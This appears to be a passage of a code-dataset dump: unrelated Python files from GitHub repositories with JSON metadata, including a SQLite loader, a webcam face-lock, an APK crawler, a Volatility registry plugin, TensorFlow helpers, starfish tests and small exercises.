schema_update(self, inspector) -> None:\n \"\"\"\n Check if there is a schema diff between the new Table and the existing\n one and if the changes can be supported, update the table with the diff.\n\n Rules:\n 1. Only support type upgrades (e.g. STRING -> VARCHAR) for existing columns\n 2. If a not supported type update is requested (e.g. float --> int)\n raise a SchemaUpdateError exception.\n 2. Never drop columns, only update or add new ones\n \"\"\"\n existing_columns = {}\n columns_to_add = []\n\n # Fetch the existing defined tables and store them in a format useful\n # for comparisors.\n all_columns = inspector.get_columns(self.table.name)\n\n for column in all_columns:\n existing_columns[column[\"name\"]] = f\"{column['type']}\"\n\n # Check the new Table definition for new attributes or attributes\n # with an updated data type\n for column in self.table.columns:\n # SQLITE does not support updating existing columns so only add new ones\n if column.name not in existing_columns:\n # A new column to be added to the table\n column_type = MAP_SQLALCHEMY_TO_SQLITE_TYPE[f\"{column.type}\"]\n columns_to_add.append((column.name, column_type))\n\n # If there are any columns to add, make the schema update\n for (name, type) in columns_to_add:\n self.add_column(name, type)\n\n def add_column(self, col_name: str, col_data_type: str) -> None:\n \"\"\"\n Add the requested column to the SQLite Table defined by self.table\n \"\"\"\n full_name = self.table.name\n alter_stmt = f\"ALTER TABLE {full_name} ADD COLUMN {col_name} {col_data_type}\"\n\n logging.debug(f\"Adding COLUMN {col_name} ({col_data_type}) to {full_name}\")\n\n with self.engine.connect() as connection:\n connection.execute(alter_stmt)\n\n def load(self, data: List[Dict]) -> None:\n \"\"\"\n Load the data provided as a list of dictionaries to the given Table\n \"\"\"\n if not data:\n return\n\n logging.debug(f\"Loading data to SQLite for {self.table.name}\")\n if self.table.primary_key:\n # We have to use SQLite's Upsert but the default SQLite for python\n # does not yet support the \"ON CONFLICT\" clause for upserting\n # So, we'll follow the slow but stable approach of inserting each\n # row and updating on conflict.\n with self.engine.connect() as connection:\n for row in data:\n try:\n connection.execute(self.table.insert(), row)\n except exc.IntegrityError:\n statement = self.table.update() # .where()\n for primary_key in self.table.primary_key:\n statement = statement.where(\n primary_key == row[primary_key.name]\n )\n\n connection.execute(statement, row)\n else:\n # Just Insert (append) as no conflicts can arise\n with self.engine.connect() as connection:\n connection.execute(self.table.insert(), data)\n","repo_name":"MeltanoLabs/target-sqlite","sub_path":"target_sqlite/sqlite_loader.py","file_name":"sqlite_loader.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7175656586","text":"def makeFace(facename, msg, endstr):\r\n print(msg) #显示提示讯息\r\n cv2.namedWindow(\"frame\")\r\n cv2.waitKey(0)\r\n cap = cv2.VideoCapture(0) #开启摄影机\r\n while(cap.isOpened()): #摄影机为开启状态\r\n ret, img = cap.read() #读取影像\r\n if ret == True: #读取成功\r\n cv2.imshow(\"frame\", img) #显示影像\r\n k = cv2.waitKey(100) #每0.1秒读一次键盘\r\n if k == ord(\"z\") or k == ord(\"Z\"): #使用者按“z”键\r\n cv2.imwrite(facename,img) #存档\r\n image = cv2.imread(facename) #读档做人脸辨识\r\n faces = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(30,30), flags = cv2.CASCADE_SCALE_IMAGE)\r\n (x, y, w, h) = (faces[0][0], faces[0][1], faces[0][2], faces[0][3]) #只取第一张人脸\r\n image1 = Image.open(facename).crop((x, y, x+w, y+h)) #撷取人脸\r\n image1 = image1.resize((200, 200), Image.ANTIALIAS) #转为分辨率200x200\r\n image1.save(facename) #存档\r\n break;\r\n cap.release() #关闭摄影机摄影机\r\n cv2.destroyAllWindows()\r\n print(endstr)\r\n return\r\n\r\nimport cv2, os, math, operator\r\nfrom PIL import Image\r\nfrom functools import reduce\r\n\r\ncasc_path = \"media\\\\etc\\\\haarcascades\\\\haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(casc_path) #建立辨识物件\r\nrecogname = \"media\\\\recogface.jpg\" #使用者人脸档案\r\nloginname = \"media\\\\loginface.jpg\" #登入者人脸档案\r\nos.system(\"cls\") #清除萤幕\r\nif(os.path.exists(recogname)): #如果使用者人脸档案已存在\r\n msg = \"按任意键建立登入者脸谱。\\n摄影机开启后按“z”拍照比对!\"\r\n makeFace(loginname, msg, \"\") #建立登入者人脸档案\r\n pic1 = Image.open(recogname) #开启使用者人脸档案\r\n pic2 = Image.open(loginname) #开启登入者人脸档案\r\n h1 = pic1.histogram() #计算图形差异度\r\n h2 = pic2.histogram()\r\n diff = math.sqrt(reduce(operator.add, list(map(lambda a,b: (a-b)**2, h1, h2)))/len(h1))\r\n if(diff <= 100): #若差度在100内视为通过验证\r\n print(\"通过验证,欢迎使用本系统! diff=%4.2f\" % diff)\r\n else:\r\n print(\"脸谱不正确,无法使用本系统! diff=%4.2f\" % diff)\r\nelse: #如果使用者人脸档案不存在\r\n msg = \"按任意键建立使用者脸谱。\\n摄影机开启后按“z”拍照!\\n\"\r\n endstr = \"使用者脸谱建立完成!\"\r\n makeFace(recogname, msg, endstr) #建立使用者人脸档案\r\n","repo_name":"taiwc/Python","sub_path":"faceLock1.py","file_name":"faceLock1.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21615713870","text":"#!/usr/bin/python\n\nimport threading\nimport pycurl\nimport hashlib\nfrom Queue import Queue\nfrom Queue import Empty\nimport time\nimport os\nimport socket\nfrom logger import Logger\nfrom rpcmonitor import RpcMonitor\nimport ndutil\n\nclass DownloadThread(threading.Thread):\n\tdef __init__(self, args, name):\n\t\tsuper(DownloadThread, self).__init__()\n\t\tself.ddQueue = args[0]\n\t\tself.dpQueue = args[1]\n\t\tself.ddLock = args[2]\n\t\tself.pdLock = args[3]\n\t\tself.pdQueue = args[4]\n\t\tself.logger = args[5]\n\t\tself.rpcMonitor = args[6]\n\t\tself.name = name\n\n\tdef run(self):\n\t\tcurlHandle = pycurl.Curl()\n\t\tcurlHandle.setopt(pycurl.FOLLOWLOCATION, 1)\n\t\tcurlHandle.setopt(pycurl.MAXREDIRS, 5)\n\t\tcurlHandle.setopt(pycurl.CONNECTTIMEOUT, 60)\n\t\tcurlHandle.setopt(pycurl.TIMEOUT, 300)\n\t\tcurlHandle.setopt(pycurl.NOSIGNAL, 1)\n\t\twhile True:\n\t\t\tdata, fileName = self.ddQueue.get(1)\n\n\t\t\tself.rpcMonitor.decPdQueueSize()\n\t\t\tself.rpcMonitor.incDownloadingTotal()\n\t\t\tresult = self.download(curlHandle, data, fileName)\n\t\t\tself.rpcMonitor.decDownloadingTotal()\n\t\t\tif result:\n\t\t\t\tos.remove(fileName)\n\t\t\t\tself.pdLock.acquire()\n\t\t\t\tself.pdQueue.put(data, 1)\n\t\t\t\tself.rpcMonitor.incPdQueueSize()\n\t\t\t\tself.pdLock.release()\n\t\t\t\ttime.sleep(30)\n\t\t\t\tcontinue\n\t\t\tself.ddLock.acquire()\n\t\t\tself.dpQueue.put([data, fileName], 1)\n\t\t\tself.ddLock.release()\n\n\t\t\ttime.sleep(30)\n\n\t\tcurlHandle.close()\n\t\t\n\tdef download(self, curlHandle, data, fileName):\n\t\tfile = open(fileName, 'wb')\n\t\tcurlHandle.setopt(pycurl.WRITEDATA, file)\n\t\tcurlHandle.setopt(pycurl.URL, data)\n\n\t\ttry:\n\t\t\tself.logger.logger('Downloading %s' % data)\n\t\t\tcurlHandle.perform()\n\t\t\tfile.close()\n\n\t\texcept:\n\t\t\treturn 1\n\n\t\treturn 0\n\nclass Downloader(threading.Thread):\n\tdef __init__(self, args, name):\n\t\tsuper(Downloader, self).__init__()\n\t\tself.logger = args[0]\n\t\tself.rpcMonitor = args[1]\n\t\tself.pdQueue = args[2]\n\t\tself.dpQueue = args[3]\n\t\tself.pdLock = args[4]\n\t\tself.dlThreadNum = args[5]\n\t\tself.dirWorking = args[6]\n\t\tself.name = name\n\n\t\tself.udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.addr = ('127.0.0.1', 7031)\n\n\tdef run(self):\n\t\tnumThreads = self.dlThreadNum\n\n\t\tddLock = threading.Lock()\n\t\tdownloadThreads = []\n\t\tddQueues = []\n\n\t\tself.rpcMonitor.setDownloadingTotal(0)\n\t\tfor i in range(numThreads):\n\t\t\tddQueue = Queue()\n\t\t\tthread = DownloadThread([ddQueue, self.dpQueue, ddLock, self.pdLock, self.pdQueue, self.logger, self.rpcMonitor], 'DownloadThread%s' % i)\n\t\t\tddQueues.append(ddQueue)\n\t\t\tdownloadThreads.append(thread)\n\n\t\tfor i in range(numThreads):\n\t\t\tdownloadThreads[i].start()\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata = self.pdQueue.get(True, 10)\n\t\t\t\t#generate name\n\t\t\t\tfileName = '%s/%s.apk' % (self.dirWorking, ndutil.getMd5ByStr(data))\n\n\t\t\t\t#select thread\n\t\t\t\tminQueueIdx = 0\n\t\t\t\tminQueueSize = ddQueues[0].qsize()\n\t\t\t\tfor i in range(1, numThreads):\n\t\t\t\t\tif ddQueues[i].qsize() < minQueueSize:\n\t\t\t\t\t\tminQueueIdx = i\n\t\t\t\t\t\tminQueueSize = ddQueues[i].qsize()\n\n\t\t\t\tddQueues[minQueueIdx].put([data, fileName], 1)\n\n\t\t\texcept Empty:\n\t\t\t\tfreeThreadNum = 0\n\t\t\t\tfor i in range(0, numThreads):\n\t\t\t\t\tif ddQueues[i].empty() == True:\n\t\t\t\t\t\tfreeThreadNum = freeThreadNum + 1\n\n\t\t\t\tif ( float(freeThreadNum) / float(numThreads) ) >= float(0.5):\n\t\t\t\t\tself.udpSocket.sendto('empty', self.addr)\n\n\t\tfor i in range(numThreads):\n\t\t\tdownloadThreads[i].join()\n","repo_name":"jovistar/nDroid-Crawler","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21640577443","text":"from pathlib import Path\nimport re\nimport os\nimport urllib.request as u\n\n\"\"\"\nValidates links from Markdown file\n:return: If file exists or link is available returns True, else - False\n:rtype: boolean\n\"\"\"\n \nINLINE_LINK_RE = re.compile(r'\\[([^\\]]+)\\]\\(([^)]+)\\)')\nroot_path = r\"D:\\Courses\\BILab_2\"\n\ndef find_md_links(md: str):\n \"\"\" Return dict of links in markdown \"\"\"\n links = dict(INLINE_LINK_RE.findall(md))\n return links\n\ndef internet_on(url: str):\n \"\"\" Check that internet resource is available\"\"\"\n try:\n u.urlopen(url, timeout=1)\n return True\n except u.URLError as err: \n return False\n\nwith open(r\"D:\\Courses\\BILab_2\\README.md\", \"r\", encoding=\"UTF-8\") as f:\n lines = \"\".join(f.readlines())\n md_links_dict = find_md_links(lines)\n for link in md_links_dict.values():\n # Validate that local file exists\n if not str(link).startswith(\"http\"):\n link = str.replace(link, \"%20\", \" \")\n link_path = Path(os.path.join(root_path, link))\n if not link_path.is_file():\n print(f\"IS NOT FOUND: {link_path}\")\n else:\n if not internet_on(link):\n print(f\"IS NOT FOUND: {link}\")\n","repo_name":"sergeiboikov/Labs.Python","sub_path":"RegEx/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17452347069","text":"from __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nfrom tensorflow import convert_to_tensor as to_T\n\nfrom util.cnn import conv_layer as conv\n\ndef empty_safe_1x1_conv(name, bottom, output_dim, reuse=None):\n # TensorFlow Fold can generate zero-size batch for conv layer\n # which will crash cuDNN on backward pass. So use this\n # for 1x1 convolution in modules to avoid the crash.\n bottom_shape = tf.shape(bottom)\n N = bottom_shape[0]\n H = bottom_shape[1]\n W = bottom_shape[2]\n input_dim = bottom.get_shape().as_list()[-1]\n bottom_flat = tf.reshape(bottom, [-1, input_dim])\n\n # weights and biases variables\n with tf.variable_scope(name, reuse=reuse):\n # initialize the variables\n weights_initializer = tf.contrib.layers.xavier_initializer()\n biases_initializer = tf.constant_initializer(0.)\n weights = tf.get_variable('weights', [input_dim, output_dim],\n initializer=weights_initializer)\n biases = tf.get_variable('biases', output_dim,\n initializer=biases_initializer)\n\n conv_flat = tf.nn.xw_plus_b(bottom_flat, weights, biases)\n conv = tf.reshape(conv_flat, to_T([N, H, W, output_dim]))\n\n return conv\n\n# TensorFlow Fold can generate zero-size batch for conv layer\n# which will crash cuDNN on backward pass. So use this\n# for arbitrary convolution in modules to avoid the crash.\ndef empty_safe_conv(name, bottom, kernel_size, stride, output_dim, padding='SAME',\n bias_term=True, weights_initializer=None,\n biases_initializer=None, reuse=None):\n g = tf.get_default_graph()\n with g.gradient_override_map({'Conv2D': 'Conv2D_handle_empty_batch'}):\n return conv(name, bottom, kernel_size, stride, output_dim,\n padding, bias_term, weights_initializer,\n biases_initializer, reuse=reuse)\n\n@tf.RegisterGradient('Conv2D_handle_empty_batch')\ndef _Conv2DGrad(op, grad):\n with tf.device('/cpu:0'):\n return [tf.nn.conv2d_backprop_input(\n tf.shape(op.inputs[0]), op.inputs[1], grad, op.get_attr('strides'),\n op.get_attr('padding'), op.get_attr('use_cudnn_on_gpu'),\n op.get_attr('data_format')),\n tf.nn.conv2d_backprop_filter(op.inputs[0],\n tf.shape(op.inputs[1]), grad,\n op.get_attr('strides'),\n op.get_attr('padding'),\n op.get_attr('use_cudnn_on_gpu'),\n op.get_attr('data_format'))]\n# @tf.RegisterGradient('Conv2D_handle_empty_batch')\n# def _Conv2DGrad(op, grad):\n# def _input_nonempty():\n# return tf.nn.conv2d_backprop_input(\n# tf.shape(op.inputs[0]), op.inputs[1], grad, op.get_attr('strides'),\n# op.get_attr('padding'), op.get_attr('use_cudnn_on_gpu'),\n# op.get_attr('data_format'))\n# def _filter_nonempty():\n# return tf.nn.conv2d_backprop_filter(op.inputs[0],\n# tf.shape(op.inputs[1]), grad,\n# op.get_attr('strides'),\n# op.get_attr('padding'),\n# op.get_attr('use_cudnn_on_gpu'),\n# op.get_attr('data_format'))\n# def _input_empty():\n# return tf.zeros_like(op.inputs[0])\n# def _filter_empty():\n# return tf.zeros_like(op.inputs[1])\n# is_nonempty = tf.greater(tf.size(op.inputs[0]), 0)\n# return [tf.cond(is_nonempty, _input_nonempty, _input_empty),\n# tf.cond(is_nonempty, _filter_nonempty, _filter_empty)]\n","repo_name":"ronghanghu/n2nmn","sub_path":"util/empty_safe_conv.py","file_name":"empty_safe_conv.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"37"} +{"seq_id":"34688704824","text":"import volatility.plugins.registry.registryapi as registryapi\nimport volatility.win32.hive as hivemod\nimport volatility.win32.rawreg as rawreg\nimport volatility.debug as debug\nimport volatility.utils as utils\nimport volatility.plugins.registry.hivelist as hivelist\n\ndef vol(k):\n return bool(k.obj_offset & 0x80000000)\n\nclass UninstallInfo(hivelist.HiveList):\n \"\"\"Extract installed software info from Uninstall registry key\"\"\"\n\n meta_info = {}\n meta_info['author'] = 'Dave Lassalle'\n meta_info['copyright'] = 'Copyright (c) 2014 Dave Lassalle'\n meta_info['contact'] = 'dave@superponible.com'\n meta_info['license'] = 'GNU General Public License 2.0 or later'\n meta_info['url'] = 'http://superponible.com/'\n meta_info['os'] = 'WIN_32_XP_SP3'\n meta_info['version'] = '1.0'\n\n def __init__(self, config, *args, **kwargs):\n hivelist.HiveList.__init__(self, config, *args, **kwargs)\n config.add_option('HIVE-OFFSET', short_option = 'o',\n help = 'SOFTWARE Hive offset (virtual)', type = 'int')\n\n def hive_name(self, hive):\n try:\n return hive.FileFullPath.v() or hive.FileUserName.v() or hive.HiveRootPath.v() or \"[no name]\"\n except AttributeError:\n return \"[no name]\"\n\n def calculate(self):\n addr_space = utils.load_as(self._config)\n regapi = registryapi.RegistryApi(self._config)\n\n software_hive = \"SOFTWARE\"\n uninstall = \"Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\n\n hive_offsets = []\n if not self._config.HIVE_OFFSET:\n for h in hivelist.HiveList.calculate(self):\n hive_name = self.hive_name(h)\n if software_hive in hive_name:\n hive_offsets = [(hive_name, h.obj_offset)]\n else:\n hive_offsets = [(\"User Specified\", self._config.HIVE_OFFSET)]\n\n for name, hoff in set(hive_offsets):\n h = hivemod.HiveAddressSpace(addr_space, self._config, hoff)\n root = rawreg.get_root(h)\n if not root:\n if self._config.HIVE_OFFSET:\n debug.error(\"Unable to find root key. Is the hive offset correct?\")\n else:\n uninstall_key = rawreg.open_key(root, uninstall.split('\\\\'))\n if uninstall_key:\n yield name, uninstall_key\n else:\n outfd.write(\"The requested key could not be found in the hive(s) searched\\n\")\n\n\n def voltext(self, key):\n return \"(V)\" if vol(key) else \"(S)\"\n\n def render_text(self, outfd, data):\n print_values = {5:'InstallSource', 6:'InstallLocation', 3:'Publisher',\n 1:'DisplayName', 2:'DisplayVersion', 4:'InstallDate'}\n outfd.write(\"Legend: (S) = Stable (V) = Volatile\\n\\n\")\n keyfound = False\n for reg, key in data:\n if key:\n keyfound = True\n outfd.write(\"----------------------------\\n\")\n outfd.write(\"Registry: {0}\\n\".format(reg))\n outfd.write(\"Key name: {0} {1:3s}\\n\".format(key.Name, self.voltext(key)))\n outfd.write(\"Last updated: {0}\\n\".format(key.LastWriteTime))\n outfd.write(\"\\n\")\n outfd.write(\"Subkeys:\\n\")\n for s in rawreg.subkeys(key):\n key_info = {}\n if s.Name == None:\n outfd.write(\" Unknown subkey: \" + s.Name.reason + \"\\n\")\n else:\n key_info['Name'] = s.Name\n key_info['LastUpdated'] = s.LastWriteTime\n for v in rawreg.values(s):\n if v.Name not in print_values.values():\n continue\n tp, dat = rawreg.value_data(v)\n if tp == 'REG_BINARY' or tp == 'REG_NONE':\n dat = \"\\n\" + \"\\n\".join([\"{0:#010x} {1:<48} {2}\".format(o, h, ''.join(c)) for o, h, c in utils.Hexdump(dat)])\n if tp in ['REG_SZ', 'REG_EXPAND_SZ', 'REG_LINK']:\n dat = dat.encode(\"ascii\", 'backslashreplace')\n if tp == 'REG_MULTI_SZ':\n for i in range(len(dat)):\n dat[i] = dat[i].encode(\"ascii\", 'backslashreplace')\n key_info[str(v.Name)] = dat\n outfd.write(\"Subkey: {0}\\n\".format(key_info.get('Name','')))\n outfd.write(\" LastUpdated : {0}\\n\".format(key_info.get('LastUpdated','')))\n for k, v in sorted(print_values.items()):\n val = key_info.get(v, '')\n if val != '':\n outfd.write(\" {0:16}: {1}\\n\".format(v, val))\n outfd.write(\"\\n\")\n","repo_name":"volatilityfoundation/community","sub_path":"DaveLasalle/uninstallinfo.py","file_name":"uninstallinfo.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"37"} +{"seq_id":"6887985389","text":"#!/usr/bin/python3\n\"\"\"\nThis module contain a single function for checking all subreddits posts'title\nFunction: recurse(subreddit, hot_list=[])\n\"\"\"\nimport requests\n\n\ndef recurse(subreddit):\n \"\"\"This function gets all hot posts title and returns them as a list\n Arg:\n -subreddit\n \"\"\"\n url = \"https://www.reddit.com/r/{}/hot.json?limit=100\".format(subreddit)\n header = {'User-agent': 'Chrome'}\n h_list = []\n\n response = requests.get(url, headers=header, allow_redirects=False)\n\n if response.status_code >= 300:\n return None\n\n return paginate(subreddit, url, None, header, h_list)\n\n\ndef paginate(subreddit, url, after, header, hot_list):\n \"\"\"This function paginates throught the results to catch each post'title\n Args:\n -subreddit: The subreddit\n -url: The url of the endpoint\n -header: The header complementary\n -hot_list: The list of hot posts\n \"\"\"\n params = {'after': after}\n response = requests.get(url, headers=header,\n params=params,\n allow_redirects=False)\n next_page = response.json().get(\"data\").get(\"after\")\n posts = response.json().get(\"data\").get(\"children\")\n for post in posts:\n title = post.get(\"data\").get(\"title\")\n # print(title)\n hot_list.append(title)\n if next_page:\n return paginate(subreddit, url, next_page, header, hot_list)\n return hot_list\n","repo_name":"iamprosper/alx-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42088628582","text":"n, k = map(int, input().split())\ncoin_type = [int(input()) for _ in range(n)]\ncoin_type.sort(reverse=True)\n\nresult = 0\nfor coin in coin_type:\n if coin <= k:\n result += k // coin\n k %= coin\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코딩테스트 대비 문제집 with Baekjoon/그리디/solution9.py","file_name":"solution9.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74283991146","text":"from PyQt5.QtWidgets import QLabel, QVBoxLayout, QHBoxLayout\n\n\nclass FormationLayout(QVBoxLayout):\n '''\n Collaborates with Formation, which recurses.\n '''\n\n\n def __init__(self, formation, top):\n super(FormationLayout, self).__init__()\n \n if formation.isSingleValued():\n self._singleChildLayout(formation)\n else:\n self._multipleChildLayout(formation, top)\n \n \n def _multipleChildLayout(self, formation, top):\n '''\n A tree-like, indented layout/widget.\n \n \n name\n ------\n | (recursion)\n |\n '''\n \n if not top:\n # display formation name in the layout\n label = QLabel(formation.role + formation.name)\n self.addWidget(label)\n # else display name in window title\n \n \n indentedLayout = QHBoxLayout()\n indentedLayout.addSpacing(20) # Apparently pixels\n \n # Create lower right quadrant via recursion\n vLayout = QVBoxLayout()\n formation.displayContentsInLayout(vLayout)\n \n indentedLayout.addLayout(vLayout)\n \n self.addLayout(indentedLayout)\n \n \n def _singleChildLayout(self, formation):\n '''\n Single row layout.\n \n name Label | value\n '''\n formation.displayContentsInLayout(self) \n ","repo_name":"bootchk/documentStyle","sub_path":"documentStyle/ui/layout/formationLayout.py","file_name":"formationLayout.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17644717039","text":"import cv2\nimport os\nimport numpy as np\nimport random\n\n\ndef sp_noise(image, prob):\n output = np.zeros(image.shape, np.uint8)\n threshold = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n output[i][j] = 0\n elif rdn > threshold:\n output[i][j] = 255\n else:\n output[i][j] = image[i][j]\n return output\n\n\ndef main():\n for folder in os.listdir(\"../stanford-car-dataset-by-classes-folder/car_data/car_data/train\")[8:]:\n folder = os.path.join(\"../stanford-car-dataset-by-classes-folder/car_data/car_data/train\", folder)\n for file in os.listdir(folder):\n original_image = cv2.imread(os.path.join(folder, file))\n blur = cv2.blur(original_image, (3, 3))\n noise_img = sp_noise(original_image, 0.02)\n flip_horizontal = cv2.flip(original_image, 1)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_blur_3.jpg\", blur)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_S&P_noise.jpg\", noise_img)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_h_flip.jpg\", flip_horizontal)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alex-stoica/Pytorch-Lite","sub_path":"loaders/enhance_dataset.py","file_name":"enhance_dataset.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040805924","text":"from typing import Mapping, Optional, Type\n\nimport numpy as np\nimport pytest\n\nfrom starfish import Log\nfrom starfish.image import Filter\nfrom starfish.types import ArrayLike, Axes, Coordinates, Number\nfrom ..label_image import AttrKeys, CURRENT_VERSION, DOCTYPE_STRING, LabelImage\n\n\n@pytest.mark.parametrize(\n \"array, physical_ticks, log, expected_error\",\n [\n # 3D label image\n [\n np.zeros((1, 1, 1), dtype=np.int32),\n {\n Coordinates.X: [0],\n Coordinates.Y: [0],\n Coordinates.Z: [0],\n },\n None,\n None,\n ],\n # 2D label image\n [\n np.zeros((1, 2), dtype=np.int32),\n {\n Coordinates.X: [0, 1],\n Coordinates.Y: [0],\n },\n None,\n None,\n ],\n # wrong dtype\n [\n np.zeros((1, 2), dtype=np.float32),\n {\n Coordinates.X: [0, 1],\n Coordinates.Y: [0],\n },\n None,\n TypeError,\n ],\n # missing some coordinates\n [\n np.zeros((1, 2), dtype=np.float32),\n {\n Coordinates.X: [0, 1],\n },\n None,\n KeyError,\n ],\n ]\n)\ndef test_from_array_and_coords(\n array: np.ndarray,\n physical_ticks: Mapping[Coordinates, ArrayLike[Number]],\n log: Optional[Log],\n expected_error: Optional[Type[Exception]],\n):\n \"\"\"Test that we can construct a LabelImage and that some common error conditions are caught.\"\"\"\n if expected_error is not None:\n with pytest.raises(expected_error):\n LabelImage.from_label_array_and_ticks(array, None, physical_ticks, log)\n else:\n label_image = LabelImage.from_label_array_and_ticks(array, None, physical_ticks, log)\n assert isinstance(label_image.log, Log)\n assert label_image.xarray.attrs.get(AttrKeys.DOCTYPE, None) == DOCTYPE_STRING\n assert label_image.xarray.attrs.get(AttrKeys.VERSION, None) == str(CURRENT_VERSION)\n\n\ndef test_pixel_coordinates():\n \"\"\"Test that the code creates missing pixel coordinate values.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X: [2, 3, 4, 5],\n Axes.ZPLANE: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X: [0, 0.5, 1.0, 1.5],\n Coordinates.Y: [0, 0.2, 0.4],\n Coordinates.Z: [0, 0.1],\n }\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, None)\n\n assert np.array_equal(label_image.xarray.coords[Axes.X.value], [2, 3, 4, 5])\n # not provided, should be 0..N-1\n assert np.array_equal(label_image.xarray.coords[Axes.Y.value], [0, 1, 2])\n assert np.array_equal(label_image.xarray.coords[Axes.ZPLANE.value], [0, 1])\n\n\ndef test_coordinates_key_type():\n \"\"\"Test that the code correctly handles situations where the coordinate keys are provided as\n strings instead of the enumerated types.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X.value: [2, 3, 4, 5],\n Axes.Y.value: [0, 1, 2],\n Axes.ZPLANE.value: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X.value: [0, 0.5, 1.0, 1.5],\n Coordinates.Y.value: [0, 0.2, 0.4],\n Coordinates.Z.value: [0, 0.1],\n }\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, None)\n\n for axis_str, axis_data in pixel_coordinates.items():\n assert np.array_equal(label_image.xarray.coords[axis_str], axis_data)\n for coord_str, coord_data in physical_coordinates.items():\n assert np.array_equal(label_image.xarray.coords[coord_str], coord_data)\n\n\ndef test_save_and_load(tmp_path):\n \"\"\"Verify that we can save the label image and load it correctly.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X: [2, 3, 4, 5],\n Axes.ZPLANE: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X: [0, 0.5, 1.0, 1.5],\n Coordinates.Y: [0, 0.2, 0.4],\n Coordinates.Z: [0, 0.1],\n }\n log = Log()\n # instantiate a filter (even though that makes no sense in this context)\n filt = Filter.Reduce((Axes.ROUND,), func=\"max\")\n log.update_log(filt)\n\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, log)\n label_image.to_netcdf(tmp_path / \"label_image.netcdf\")\n\n loaded_label_image = LabelImage.open_netcdf(tmp_path / \"label_image.netcdf\")\n\n assert label_image.xarray.equals(loaded_label_image.xarray)\n assert label_image.xarray.attrs == loaded_label_image.xarray.attrs\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/morphology/label_image/test/test_label_image.py","file_name":"test_label_image.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"2634524946","text":"import webbrowser\r\nimport time\r\nfrom pynput.keyboard import Key,Controller\r\nimport urllib\r\nimport re\r\nimport keyboard\r\n\r\nurls = 'https://humanbenchmark.com/tests/aim'\r\nfor b in range(0,10,1):\r\n\twebbrowser.open(urls,new=0)\r\n\ttime.sleep(3)\r\n\tfrom pynput.mouse import Button,Controller\r\n\tmouse=Controller()\r\n\tmouse.position=(950,417)\r\n\tmouse.click(Button.left)\r\n\ttime.sleep(1)\r\n\tmouse.position=(440,251)\r\n\tx=440\r\n\ty=251\r\n\tfor a in range(0,30,1):\r\n\t\tfor y in range(251,555,25):\r\n\t\t\tfor x in range(440,1361,25):\r\n\t\t\t\tmouse.position = (x,y)\r\n\t\t\t\tmouse.click(Button.left)\r\n\t\t\t\tif keyboard.is_pressed('q'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse: \r\n\t\t\t\t\tpass\r\n\r\n\r\n\r\nmouse.position=(1361,555)","repo_name":"almin14/python","sub_path":"python/New Text Document.py","file_name":"New Text Document.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4246214399","text":"import math\n\n\ndef int_to_snafu(char):\n if char == 2:\n return \"2\"\n elif char == 1:\n return \"1\"\n elif char == 0:\n return \"0\"\n elif char == -1:\n return \"-\"\n elif char == -2:\n return \"=\"\n else:\n raise ValueError(char)\n\n\ndef SNAFU_to_decimal(SNAFU_val):\n snafu_list = list(reversed(list(SNAFU_val)))\n vals_to_sum = []\n for i in range(0, len(snafu_list)):\n if snafu_list[i] 